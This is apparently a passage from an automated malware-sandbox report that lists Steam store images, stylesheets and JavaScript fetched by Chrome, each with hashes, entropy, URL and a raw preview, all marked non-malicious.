        SHA-512:865821D473757E34A2E03F910F4A5924C34F35B233246922CCF2C7BDAB502290429201638EAE016CD768C0365336D982069CF68F4BA62E198CA7D92173149176
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S2_ultimate_steam.png?t=1705420866
        Preview:.PNG........IHDR...h...a.....Kj.K....pHYs............... .IDATx.\.....#. .C.. ...C..+G.o.....G...._.9{U..@.-;.A..{.o.....,.o.....o..d.6./....cb1.i{...".s@.......[ ..6.+|..2..0A.2<......X...Zk.X.....r.C. .{!..</.Hx.K.......Pt...Da..hA...\<..sE....8bn..8.YpA."v.r=.$,....`.KR6...<+..e.........y=.x....<....p..azII<.%D.. .<DZ.._...w...->`..A..[...5..X.......#.9..$.5.&m.....]..Hx..!. i...Zx. i. ......sM..(...lP..]RK..).&..\[.......^...#K...0(.t,.f....h...")......$..i`H...[.{...1 ..6...5..I...g......}hz.L..,..{.,e.a......0.0........\.....I-.....$.4...seKhA..1`..x.....E.@.V"..5..8XY.B...M..."a.0._.......kP ....V.9..W.1.J......t..X.!....MH.....JU.-......S...y..H.._.Hbu`.^...y...L.4.<...!..C....8Z..b.+.yDbe.&2P......&w!Z.=.H/....M.Y.^.....$lu.4.|nr.Nf.......2(.w!..m....hz.r8.1,..]...8..s...I...x...... ..2. za..k......O?A.U.h.D,..|lRZ,..............H...04....1.6W&V;.......8..............\.....Z...|......I&..Y.K..%.k....8q.&. `..^.4...'.....]C4...]..`.qx.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):34907
        Entropy (8bit):5.0328722132675185
        Encrypted:false
        SSDEEP:384:XiIMqpLgJ+Z11Nco/iBlNWycbaBlP4ybtP4zSbUZVdn0gle:SIhpLgYZPNco/iBlNWyc234yazSod0se
        MD5:032EB1425C2CAEBFAD53ED3B89D49165
        SHA1:8EA206DE1076774F6039EC188952AAAE4441B7B3
        SHA-256:A311DFF2B3845700627DC9BCDD9BAE22DD0439406B4523A96247668470ABCB90
        SHA-512:6FB112155A930F7C071BB653E96710B82F63C6384748CF0299BD302A174B3811B6633CC016F707F2D8958AC3EB855ACCD463AD9B6D775BD6C16898D8E913E4BD
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/v6/game_mob.css?v=Ay6xQlwsrr-t&l=russian&_cdn=cloudflare
        Preview:....@media screen and (' . TABLET_RESPONSIVE_CSS_MINWIDTH . ') and (' . RESPONSIVE_CSS_MAXWIDTH . ' ).{../* Make the age gate drop-downs readable on tablet screens */...html.responsive #app_agegate select {....appearance: none;....-webkit-appearance: none;....background-image: url( '/public/images/v6/btn_arrow_down_padded.png' );....background-repeat: no-repeat;....background-position: right;....padding-right: 30px;....font-size: 16px;....height: 30px;....padding-left: 15px;...}...html.responsive #app_agegate .agegate_btn_ctn span {....font-size: 16px;...}...}../* Make the age gate drop-downs readable on tablet screens */...html.responsive.rn_mobile_app #app_agegate select {....appearance: none;....-webkit-appearance: none;....background-image: url( '/public/images/v6/btn_arrow_down_padded.png' );....background-repeat: no-repeat;....background-position: right;....padding-right: 30px;....font-size: 16px;....height: 30px;....padding-left: 15px;...}...html.responsive.rn_mobile_app #app_ag
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65371), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):833852
        Entropy (8bit):5.641774644483536
        Encrypted:false
        SSDEEP:6144:At07zYO2+E4PxCPhXuvnJGm2zPpGM4g6vphw8fzkOPtV99wHgHdQEGigAT:At0gmPxKhyJGm2DN4TphjDMif
        MD5:CA2179ED2F6871334B5A9C64D1750AAA
        SHA1:45D2B5BA8C6DAA1D8C6A4C479EE9DFC23191B94B
        SHA-256:162DE439ABAE65D2BABC16B69823C131CD1B859916A2B14656C54207FB80CD5F
        SHA-512:BECB2627326525707B5CD94C4A7B41671D1C7B78D28FE0FDA52F0FE26DF8F8D94D0B8CBF4E0E8D7F7DD2E0551CF400083CAC9837537044FDEC73A9226EF42715
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/main.js?v=yiF57S9ocTNL&l=english
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[179],{51194:e=>{e.exports={FocusRingRoot:"_3PH_XZYjqRMfVtlm5hbWz3",FocusRing:"_1IZrQ5Gmmvv0TMVF07zSq0",flash:"_1YTKZzpZzBEruHqjfaSm2q",growOutline:"Z3LxSTUmQb5RlaA4-G2RD",fadeOutline:"_2hZu3k2oOq-M2UmoA0An2N",blinker:"_3wFMMgT2t6sECeNlGtBjDN",DebugFocusRing:"YxeOZVLgl_cW7IESy3NHt",FocusRingOnHiddenItem:"_2OusVQKikkszayzpUDX35h"}},87123:e=>{e.exports={ScrollPanel:"_1CXdiS1qYxpxp_UoUYeo1k",ScrollY:"_313lBO-jwNHzNrjZznA-74",ScrollX:"_1oRGoiP88OvaMu0R8O6zNR",ScrollBoth:"_3S2KoD34fIYgAqKqp_j4F4"}},74736:e=>{e.exports={HoverPosition:"_3XUANycKE9h4rEXlPo3TIW",Ready:"qEo88cpdjUGTMNgC_QK8c",NoSpace:"_2NTbbe3ZK4ExTBIfPyPTpZ",EnablePointerEvents:"_2MP9nTdz-JMvAvlIcFdd8r",HoverAboveModal:"_1SHX2kGS9WtIThx3v7JOV-",HoverPositionOuter:"EUN4GPmCCaj1QX2Yy9CVb"}},27241:e=>{e.exports=
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):88634
        Entropy (8bit):7.980175995284883
        Encrypted:false
        SSDEEP:1536:EeIMMSxCAfzsUI2XTifeF5VF0yHie76KxCM28s/2HCC2ckbB1NZflGUjTzlIT:EzsLY2XUKVFXCKxC93ckd1NZf0UrGT
        MD5:FB9B430090CDA57836038617EA9234E0
        SHA1:5849554A011FA4C2A64C29F242C2FC41D09F918A
        SHA-256:C163DE7A0F2AE775CACAB38978B022324307845C050D365593CED6E86AC44F3B
        SHA-512:8E01D8849856D706ABB7F375DDB9240DDA572E1C2D410009C8B66BDCD96B2818C41135A501C1BD799D8002EE95A349345FF9D062A2A484A870C984A2347B2D8E
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/capsule_616x353.jpg?t=1713793346
        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................q...........................!.1A."Qaq.2....#B...3Rr.b...$45t....%8CGSsv..........&UWcdfu.....()7DTVg.....9E.......................................S........................!1.A."Qaq...2.......#3BR...4Tbr....CSs...$&Dc...56dt.%...............?.......T.d.B.._^.K]P.X...K..In!$...K..$...%.^..E|..-J.!'B....2....!\\:d.7$C..~.s...H..e.(.r:A..e.CkN.)Q..v0..*.?8R.|..[..s.w...sa..C..S.%W...D.`....).F...`.j3\..$.J.%..\.j.q{.......|e..."..~B.....!......2....L.S.....C.......Q.v{.. .mC...La.4...\..8..sk;*e....%;._.B. ....W.:.....w..q..'..].....w..k5*s...S.%j.*q.d...l..m.Z.8...B..+..4........s..F.&.......}......8U...it.{.zVE../....5........D.%.X.T..C.y...?.d.8.6us..h6..j......)Y<..C...v..$..g.yDB..!...J..v.K0M...d.V..=&.1N..XJ.......).an...R...0RI..D|a.'."...$(.p.I.E
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1430
        Entropy (8bit):6.915444207165524
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVag7yJ3VR7GmXF54+mC8yq8/23CMwMIE+b8Dllc:HZNn2lpWJ3nnwDNmlPbUI
        MD5:AFC159FE5F0F26FA7282505DA9887CC3
        SHA1:C1CD55380C2AF435876989F94E8B0715042C2ADE
        SHA-256:4BE942A34871DD6F8F14B43D27C31B049BE7F6544C05685D4F35ABDD329DE176
        SHA-512:8F7DCB7E99CEED8F86575A05FF7D329EE2FC67CD18C6D53B2833A6AA1EEDE2586D57688F27901D941D2B6351412957468CCE5CA69101D86911390BF04FD82763
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/ico/ico_twitter.png
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:6E745BD792D411EE8F80E4F5B5148EC9" xmpMM:DocumentID="xmp.did:6E745BD892D411EE8F80E4F5B5148EC9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6E745BD592D411EE8F80E4F5B5148EC9" stRef:documentID="xmp.did:6E745BD692D411EE8F80E4F5B5148EC9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>{KL.....IDATx.b..U.d``.......@...4.....0.4.9...[`...e.5U...6V..G..d.....I2.].......?y.............^./....&.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):3634
        Entropy (8bit):7.794028345481188
        Encrypted:false
        SSDEEP:96:xgefOw79InHborYQ7F81WnO4r6dj78VEc185Yv:owJGorv1WJ/2
        MD5:29733FC12120D092DE74B80D415327F0
        SHA1:EAFE269D3119E5E8A312459E67363A3FB7397663
        SHA-256:0A46FA735671FEB45F2E432D9DF993D44DB85BF701D0D8B8F2ECD67870F58797
        SHA-512:77DBECFEBD7926EAE62814F0C19FAA37C4966C5A1C7E8267543A16EB34018DFA76F1F944AB71C7752520E581B045BAAE0BC0B0CEFE299671918550138FD4A6BF
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/570/capsule_184x69.jpg?t=1714502360
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;...........................!1A.Qa.."q...2B..Rb...#3St.....................................0........................!1.A.Qaq..2.."R....C..............?...O.l....`...@.g$..$I..(.0..8.$A........u?X..I.`...OH..8... .....9.L... q..s........A.....|........E@...."..0...`.. .I......<s.:NL.*{..*.\@...y@.$.....{@........3....8.D s..d`..... .....`..H.V..g.~.R.Jy.....AF...#..iYw&.Za..u..!#....1..T'UOd~..Uz.n..p..3.[u02.3..~.....:.uL:...........+..O..#.S)...6......,y.F?...........Gk...<.t...b......S.}L?...d~....?u...;%1K.zRm....(q.~R#..r....r..21.b...b.\5.".^...rt....@....&I..f.d.s.....%<s.:H..}L.7....R@..s..............."..A..#..H.h......\......r|...L.......iI|...t..h..f.g.Ya.T....D.....x_....c....>]..O..g;?H..>...u..GJ..-.s.....O..z...2.k]4...y.).J.....9.NG..:..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):10651
        Entropy (8bit):7.957800355151082
        Encrypted:false
        SSDEEP:192:azRIHT0kPRtokoPxBs6UJZYhSF6+fyudAMOsZrf5CmZTAZ4:+i7atx3qyhE6+6udrZ702p
        MD5:ADC395485E6506711135DC87837A2401
        SHA1:A387839F55F31F8595F3E8BE97F3C20CC28873D9
        SHA-256:CCDF0552B11795678395688D319E9BBEB6F28A708613D72EE180D40EB27DFB38
        SHA-512:CEBF281D7E9F967E9C43370D3A8B64728D516EB353473FC2A5AADC327FD453A712D10091C9BAF2EF87780DD16AFF9949C54475FCEFE7C796391C3626C1F8AE15
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/subs/354231/header_292x136.jpg?t=1645044526
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................N.........................a...!1A.."Qq2...#BR...b....$%35ETUdrt...67s..........................................<.........................!.1AQaq......."2..$3...BRSr..%4Cb............?..^.d-.c.n.e#\.t..S#.7A..5..hvS5.7C....]..{.......~.e..v..v[...]..[....RH..]..|..At;)r....R.7..4[)r....l..K....K....e.Rj.=..I."i6Y.MX.&.\....l....t.-r.T?I..)5B.6Z....M.yB...e.!..&..C!.M.Z...M.....e..)...E..F4.(..A.I......vPd..4.(..,.o.$..|.M......"h6DF.A....9.A..#..h6DH.h7A..D^At*[.y.....]..[...........7.....h..l).7..4[).$....MI.r..dE...4{)r..".<z)r.V.....Y.I..@....,...]&.\.....k.*..N..\.T?I.....A.yb....bE.l..fE...fP.=....G......&.e..)"ivPh*.&.e....]..U.:]..^.M.l*...."m.".E..o...y..~..hE..".=..C.DTE.....". .... ...l....~.e-.v.....6...l....n.dT...t[).6....".k!.E.".k!.Q..9.G..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7340
        Entropy (8bit):7.940077484745219
        Encrypted:false
        SSDEEP:192:6xM/jQMq58pzu/t5Q43TVUMNW5bobPufM2CjNgwf2y:6oQMq5kzm5Q4W2bPufLCRF2y
        MD5:B83E765D7CB0D2D1AD427524EB3F5C7E
        SHA1:B4725659FBB8FE8A70338DA8C41BF02E36E7596B
        SHA-256:404986DB2FCA9B77E3CA1204C40427929FD791BF2E54437470CB29457D39BA15
        SHA-512:98B2CE7E523C22562EDAB882855D146610AF33D1A30CC85882F51D3E039FCEDC65AA0FED30E476FAC45D88A0F4EC9134C78A9ADAFAC803F200FBCE229DF74565
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1172470/capsule_184x69.jpg?t=1715104113
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@..........................!.1.AQ.."aq.2...#$.%BRr....45CSc......................................:.........................!1.AQ."aq...2..#...3BR....S.Cr.............?..w.'...ax...t....6......l..(..X<...P.P.+..)..za..E......kI...>...$....y...V...g...m.z.o....+..s.3.[LR.~....D..t.#..T..*..{~B..CI.s[..`.....(.l.S...P..j.;..........n{:..=~..F...-.;0;.#...w..M.3....+..jj........$v..T.j.....yt.j_3........a.i..YER.V...x.1o.T..._.x.Z\K4.?.Rig].y.....sL...hi...Q...j'..O.%.......M._..M...x.xK...e."...$...?Aw.}.u..b.-...a...`.^..b.............s..;x.....l.Z..axg..&.U..-...G.//;...Ru.9..il.....W&G.........6..h.EIj.2......}pci8.7U.,.C..oN.r.@:....n...5.p..|..j.......|...*[..C....b.fid.;...=%..j.C.e..}.A....,..O6.......n..:.!uN......][..-.5:.mN}.v....k^.n..=..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (6750), with CRLF line terminators
        Category:downloaded
        Size (bytes):6897
        Entropy (8bit):5.376580870873898
        Encrypted:false
        SSDEEP:96:vZCCUxPR5QxS5Mi6B68cB5UUpcd+EWoxnhRTShS/Mrll2YZrjKBosk3fujvJukr6:sCe3YS5DURWoxGlDdjKBHuEr4I1jY1
        MD5:BD1D1917E9540AF851481001F954E04E
        SHA1:00B9FF6D9248EA8F369DF435D4DE21FA1EE5EC29
        SHA-256:6A9C6D4AB8BBBCC99589BC2A0EF60339ECAB27D93A8292756D08286EE028B16C
        SHA-512:C9A88D56536C26B05BAB5455A331E125F4E5284C0113CB22CDFD07337B064C982FB7CC61C4D7F710302528C25D382296C3ADCEFD3FFDDA83DCFAD74C8EB8F6C6
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/flot-0.8/jquery.flot.time.min.js?v=.tcjKevZLo5Un&_cdn=cloudflare
        Preview:/* Javascript plotting library for jQuery, version 0.8.3.....Copyright (c) 2007-2014 IOLA and Ole Laursen...Licensed under the MIT license.....*/..(function($){var options={xaxis:{timezone:null,timeformat:null,twelveHourClock:false,monthNames:null}};function floorInBase(n,base){return base*Math.floor(n/base)}function formatDate(d,fmt,monthNames,dayNames){if(typeof d.strftime=="function"){return d.strftime(fmt)}var leftPad=function(n,pad){n=""+n;pad=""+(pad==null?"0":pad);return n.length==1?pad+n:n};var r=[];var escape=false;var hours=d.getHours();var isAM=hours<12;if(monthNames==null){monthNames=["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]}if(dayNames==null){dayNames=["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]}var hours12;if(hours>12){hours12=hours-12}else if(hours==0){hours12=12}else{hours12=hours}for(var i=0;i<fmt.length;++i){var c=fmt.charAt(i);if(escape){switch(c){case"a":c=""+dayNames[d.getDay()];break;case"b":c=""+monthNames[d.getMonth()];break;case"d
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65371), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):822331
        Entropy (8bit):5.64046416146523
        Encrypted:false
        SSDEEP:6144:LtFrePPcYh29t4z0chYuoZvsW2kPJkLtY6n64p0zpp2Zv5QVuYMSqb/6gxp2:Lte5bzlhsRsW280tr64EW6Q0
        MD5:1392BE9F7A4C4B72CC7F694295C2B4E5
        SHA1:79560A8E9A57B18BB91B59387AD1040EA1B3CF47
        SHA-256:526D60B1B51597D8036C2831FB0BCE1BDE3D14E184DF870E930BDFBCA32066A3
        SHA-512:41B5E02BC718C251D8918F5AF3F3988ED63E592A35EED1BAC603F50E2051B9AF864B4E6C99A904E333A32D425C2A5F51B824D79E2508EC56F3812CAB0DD126D4
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main.js?v=E5K-n3pMS3LM&l=russian&_cdn=cloudflare
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[179],{51194:e=>{e.exports={FocusRingRoot:"_3PH_XZYjqRMfVtlm5hbWz3",FocusRing:"_1IZrQ5Gmmvv0TMVF07zSq0",flash:"_1YTKZzpZzBEruHqjfaSm2q",growOutline:"Z3LxSTUmQb5RlaA4-G2RD",fadeOutline:"_2hZu3k2oOq-M2UmoA0An2N",blinker:"_3wFMMgT2t6sECeNlGtBjDN",DebugFocusRing:"YxeOZVLgl_cW7IESy3NHt",FocusRingOnHiddenItem:"_2OusVQKikkszayzpUDX35h"}},87123:e=>{e.exports={ScrollPanel:"_1CXdiS1qYxpxp_UoUYeo1k",ScrollY:"_313lBO-jwNHzNrjZznA-74",ScrollX:"_1oRGoiP88OvaMu0R8O6zNR",ScrollBoth:"_3S2KoD34fIYgAqKqp_j4F4"}},74736:e=>{e.exports={HoverPosition:"_3XUANycKE9h4rEXlPo3TIW",Ready:"qEo88cpdjUGTMNgC_QK8c",NoSpace:"_2NTbbe3ZK4ExTBIfPyPTpZ",EnablePointerEvents:"_2MP9nTdz-JMvAvlIcFdd8r",HoverAboveModal:"_1SHX2kGS9WtIThx3v7JOV-",HoverPositionOuter:"EUN4GPmCCaj1QX2Yy9CVb"}},27241:e=>{e.exports=
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7987
        Entropy (8bit):7.927181818576695
        Encrypted:false
        SSDEEP:192:eTrCqQ+1aNj/B+xSL62TeXVSP1qOJkZV+o78wJn2z/7K3S63bC:PP+AJ+xSPTeXwdqOJkZh7JnQzK3SsbC
        MD5:91BFA893C6E8C1C435099489C1E325DE
        SHA1:479F9415A85E123FC7F486BC79717A86CF51664F
        SHA-256:B0DE1AF2EEDE9E080EC8B9085399A04AA75C10B917374972319CCEEAE6434066
        SHA-512:9ECCED4136A9D4A5ECAC529647AA516C371A8BDF0574CEA4410A57B560D0B4592FC10599768D75E0668A15731EFAF286F96A3ED2831EE711A83EB985CB2B9708
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................=..........................!..1"A..Qaq2.#B..b......$3R...4Cr................................1.......................!1.AQ."aq...2......B..#3............?..t.Ah...}....Ey.....PA). .td....x..0.B..o*.8.%....a.Hm.z........i...5..-.1Om.e. ..........j...c.PG.^...R..t.]..U. .q.>....ig.*C0H.1.J..v}H...O....6t..QM5.Kr:Pv.U....*..#.4...j.|[U.}..J..rq...E....@4....v...]\c.3.#i)..#.;"B...L.) ...$...~.D.Ls5..+v..s.k...y(m.d..-$..<..y..$..6v...$........GReE.E[.e...1%..4x....p...?<.n=..L.T...,9....+b3RP.n..G.T...q$...|.oQ..Z.}.....Yy2....\R...............,.....\.a.m* e.~..G.UE......4..=.R..Y#....?...[..U2m.aH.[Q.i.?Rq.?0..LR..[....@k...B.?I..+...1.B...S.%>.M=..NR..-...*.<~t$;s:.....O]H.e.......W..Tq....g......!v\.P...s....c.......)..H#.O?..&.`3..a.a...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):239350
        Entropy (8bit):7.9885040463956525
        Encrypted:false
        SSDEEP:3072:1LdsEEZ+82mvrddDwHNXdfK63AMdCiSj10Mv23UX2zUmIyLR2CR+wUlfLdmhA:15G+9mvrDwnoMdJsjv23xvIyZhUlTAhA
        MD5:B37FECF336303A33CB36D7823701B127
        SHA1:D0B1061FE778AFA2680C0184177DE7DB22A153A2
        SHA-256:B13AD617EF14D927A168DC3F75CEF5B10D189601E74A5C12E64E216D6BE6D4A9
        SHA-512:DFA1B129BD7FB0960FA91C14E7B1961D66AB8AB91D24B4E49FFEB9A50E9BD8C8021D297CA56432ED1245109AA6ED48919CACCD68B7CDD693858728B4E4F204AB
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-02-20T14:18:57+02:00" xmp:ModifyDate="2023-02-20T14:18:57+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:e5b33602-a590-a34a-9014-611001da
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):33738
        Entropy (8bit):5.263546738678096
        Encrypted:false
        SSDEEP:768:1rv31+3R8zIF/3doix2R1pW81qWZRhcJGMJhpJfS2:FpP1vZRxGzS2
        MD5:0ABAE40EE6CFA8B72ABFB79829D53400
        SHA1:E87D3AA5EBFEAC3D486FB3D9913A81BE19AF3762
        SHA-256:C54F7E964FABEFC31C2DF4864777DB262E62C3236A293FBD075DEAF1D538C2ED
        SHA-512:A347D51254A5BA555F5CFCFFAAEB40F687C549B8E2C76EAF98F4E4522A8F5AE5A358F10119608C2657E30176D4675FD11C2670DD3F923BD788F8D30CA45A5575
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/css/buttons.css?v=CrrkDubPqLcq&l=english
        Preview:.btn_green_white_innerfade {...border-radius: 2px;...border: none;...padding: 1px;...display: inline-block;...cursor: pointer;...text-decoration: none !important;...color: #D2E885 !important;........background: #a4d007;.....background: -webkit-linear-gradient( top, #a4d007 5%, #536904 95%);..background: linear-gradient( to bottom, #a4d007 5%, #536904 95%);..}......btn_green_white_innerfade > span {....border-radius: 2px;....display: block;...........background: #799905;.....background: -webkit-linear-gradient( top, #799905 5%, #536904 95%);..background: linear-gradient( to bottom, #799905 5%, #536904 95%);....}.....btn_green_white_innerfade:not(.btn_disabled):not(:disabled):not(.btn_active):not(.active):hover {...text-decoration: none !important;...color: #fff !important;........background: #b6d908;.....background: -webkit-linear-gradient( top, #b6d908 5%, #80a006 95%);..background: linear-gradient( to bottom, #b6d908 5%, #80a006 95%);..}......btn_green_white_innerfade:not(.btn_disable
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):49348
        Entropy (8bit):7.983823650603006
        Encrypted:false
        SSDEEP:768:+5emD0fcQGRI40hnWQ4krs1zQkmNdRsBHrdIA2ZjFXzHVnMmcBO3s:+omaWIVWvkiAsHrdxepj2O3s
        MD5:2D4F4E7802EEB96F68ECEDCF573200D0
        SHA1:EA55CB097141E919D767A8546A195CBA6B945863
        SHA-256:0EDC748CBDD71CDA9901154F55AE5E4689BEFCA7A8A5510C10AE8336CA468A1C
        SHA-512:49D3AC0E65800475FEB08C7A98E2123627A4037FAB8DAC357C8F7A29B5F5ADB43B98638D3F8168FD0AD58E3B9E1DAA31D90E9B38B7B0235A9B384318738C6F58
        Malicious:false
        Reputation:low
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................U........................!..1.AQaq.."..2B....#3Rb...r...$4Cs...56S.Dc....7t..%&Tuv.................................-.......................!1A.Q."2aBq..#R.................?....ku5.J.N..{g....R!.hu;..3...do.:.p:.z&6..........Y.6.5].B(..#...e...<9.Y..|S.....9....Q.4....\W.O...We.m..j|?mqj.i.f..'sK.r.b...&.N.iN...j~...6...v....l.*S.q`..=H.j../..l.......+.s.G~..).....i..d..@.u,..>.4.r.o!....U..Td.u./l..8UV"..Z..O.e..*....NX..[.Po.J....J....t^..1Z.......H..N.e...../.jtZ...%b..>-BA...O.D......r.x...............$...;..z....6..^2.vL)g.......d..}(.q.F[..:oSqTtG,..X.u)Q1.H.lS..;.....U.......J..^\.4..N[..h....T/...,1L..W.a_...;.|.x..,.]...{..,|*I.{8..v.......zP.e.~'$y..k.m..d...L...mA.....QG.3.:...A.+k.T.`..H....H...(...:b.Q.*,....`.t.'.K...yzT...b@...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1850x450, components 3
        Category:dropped
        Size (bytes):187730
        Entropy (8bit):7.953543760778215
        Encrypted:false
        SSDEEP:3072:+jN32VfU/ryvafr2GGTPssK5bOq9KHDaGuSB/AEaT0M4FhQKchiCKF/J:M5/ryWcTSz9CaGrIV091CKpJ
        MD5:C970CE7B066EA4F8C75EF8F178290AB4
        SHA1:A870C378D10C2EC7A2033A667F8C53C7E8CEAC49
        SHA-256:98665A8CCE01826E48B86614CCAC960C57134F0F285A50F6B8A9823C0292A8A0
        SHA-512:6C86E0A951CBEE8F8B1A1E6EE2347C60D3F56B1ABBA4CB9AFDA97BC50BECE69A7DF592368FD6704297EA524250BB1BBD0E93BC1519D01FCA33D0DA3B20BF4B38
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......<.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condit
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):55848
        Entropy (8bit):7.9743413752575005
        Encrypted:false
        SSDEEP:1536:B7A0QzWXpdomtgHcauX7hMKHiqpoIDk5xmdrML52Pli:B7kap3KL27piqjDk5xiE2M
        MD5:BD18C87EE0425F191A892168116391BD
